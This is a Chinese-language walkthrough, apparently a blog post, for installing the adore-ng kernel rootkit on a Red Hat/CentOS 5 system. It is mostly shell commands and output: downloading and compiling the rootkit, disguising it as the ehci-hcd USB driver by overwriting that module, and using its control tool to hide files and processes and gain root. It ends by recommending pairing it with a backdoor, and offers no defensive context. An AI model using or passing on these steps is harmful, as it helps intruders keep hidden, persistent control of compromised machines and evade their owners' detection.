#wget http://www.sectop.com/soft/adore-ng-0.56.zip 下载
#unzip adore-ng-0.56.zip 解压
#cd adore-ng-0.56
#cp Makefile.2.6 Makefile 使用2.6内核的Makefile
#make 编译
提示没有/usr/src/linux目录
#vi Makefile 查看一下发现是需要内核源码
挂载光盘以后安装kernel-devel包,或者直接yum -y install kernel-devel
#rpm -ivh kernel-devel-2.6.18-128.el5.i686.rpm
#ln -s /usr/src/kernels/2.6.18-128.el5-i686/ /usr/src/linux 创建软连结
#make 从新编译adore
替换不用的内核模块为我们rootkit的模块
#lsmod 看下used by 为0的
Module Size Used by
nls_utf8 6209 1
autofs4 24261 2
hidp 23105 2
rfcomm 42457 0
l2cap 29505 10 hidp,rfcomm
bluetooth 53797 5 hidp,rfcomm,l2cap
sunrpc 144765 1
ipt_REJECT 9537 0
ip6t_REJECT 9409 1
xt_tcpudp 7105 6
ip6table_filter 6849 1
ip6_tables 18053 1 ip6table_filter
x_tables 17349 4 ipt_REJECT,ip6t_REJECT,xt_tcpudp,ip6_tables
dm_mirror 23109 0
dm_multipath 24013 0
scsi_dh 11713 1 dm_multipath
video 21193 0
hwmon 7365 0
backlight 10049 1 video
sbs 18533 0
i2c_ec 9025 1 sbs
button 10705 0
battery 13637 0
asus_acpi 19289 0
ac 9157 0
ipv6 261473 17 ip6t_REJECT
xfrm_nalgo 13381 1 ipv6
crypto_api 12609 1 xfrm_nalgo
lp 15849 0
snd_ens1371 28513 0
gameport 18633 1 snd_ens1371
snd_rawmidi 26561 1 snd_ens1371
snd_ac97_codec 93025 1 snd_ens1371
ac97_bus 6337 1 snd_ac97_codec
snd_seq_dummy 7877 0
snd_seq_oss 32577 0
pcspkr 7105 0
snd_seq_midi_event 11073 1 snd_seq_oss
snd_seq 49585 5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event
floppy 57125 0
sg 36189 0
snd_seq_device 11725 4 snd_rawmidi,snd_seq_dummy,snd_seq_oss,snd_seq
snd_pcm_oss 42817 0
snd_mixer_oss 19009 1 snd_pcm_oss
snd_pcm 72133 3 snd_ens1371,snd_ac97_codec,snd_pcm_oss
snd_timer 24517 2 snd_seq,snd_pcm
snd 55237 10 snd_ens1371,snd_rawmidi,snd_ac97_codec,snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer
soundcore 11553 1 snd
pcnet32 35269 0
mii 9409 1 pcnet32
i2c_piix4 12237 0
snd_page_alloc 14281 1 snd_pcm
i2c_core 23745 2 i2c_ec,i2c_piix4
ide_cd 40161 1
serio_raw 10693 0
cdrom 36577 1 ide_cd
parport_pc &n
bsp; 29157 1
parport 37513 2 lp,parport_pc
dm_raid45 66509 0
dm_message 6977 1 dm_raid45
dm_region_hash 15681 1 dm_raid45
dm_log 14529 3 dm_mirror,dm_raid45,dm_region_hash
dm_mod 62201 4 dm_mirror,dm_multipath,dm_raid45,dm_log
dm_mem_cache 9537 1 dm_raid45
ata_piix 23621 0
libata 156677 1 ata_piix
mptspi 23625 3
mptscsih 36929 1 mptspi
mptbase 76901 2 mptspi,mptscsih
scsi_transport_spi 26305 1 mptspi
sd_mod 25153 4
scsi_mod 141589 7 scsi_dh,sg,libata,mptspi,mptscsih,scsi_transport_spi,sd_mod
ext3 124233 2
jbd 56937 1 ext3
uhci_hcd 25421 0
ohci_hcd 24681 0
ehci_hcd 33357 0
我们选择ehci_hcd这个
#modprobe -l | grep ehci
/lib/modules/2.6.18-128.el5/kernel/drivers/usb/host/ehci-hcd.ko
#modprobe -r ehci-hcd 先卸载
#cp adore-ng-2.6.ko /lib/modules/2.6.18-128.el5/kernel/drivers/usb/host/ehci-hcd.ko 替换
#modprobe ehci-hcd 从新加载
#./ava I 查看信息
Checking for adore 0.12 or higher …
Adore 1.56 installed. Good luck.
ELITE_UID: 2618748389, ELITE_GID=4063569279, ADORE_KEY=fgjgggfd CURRENT_ADORE=56
安装成功
使用方法
#./ava
Usage: ./ava {h,u,r,R,i,v,U} [file or PID]
I print info (secret UID etc)
h hide file
u unhide file
r execute as root
R remove PID forever
U uninstall adore
i make PID invisible
v make PID visible
隐藏文件
我们可以把这个目录进行隐藏
#cd ../ && mv adore-ng-0.56 /tmp/.adore
#/tmp/.adore/ava h /tmp/.adore
#ls -al /tmp 列下看看
普通用户到root
这个rootkit的隐藏效果不错,如果结合其他的backdoor使用,就更好了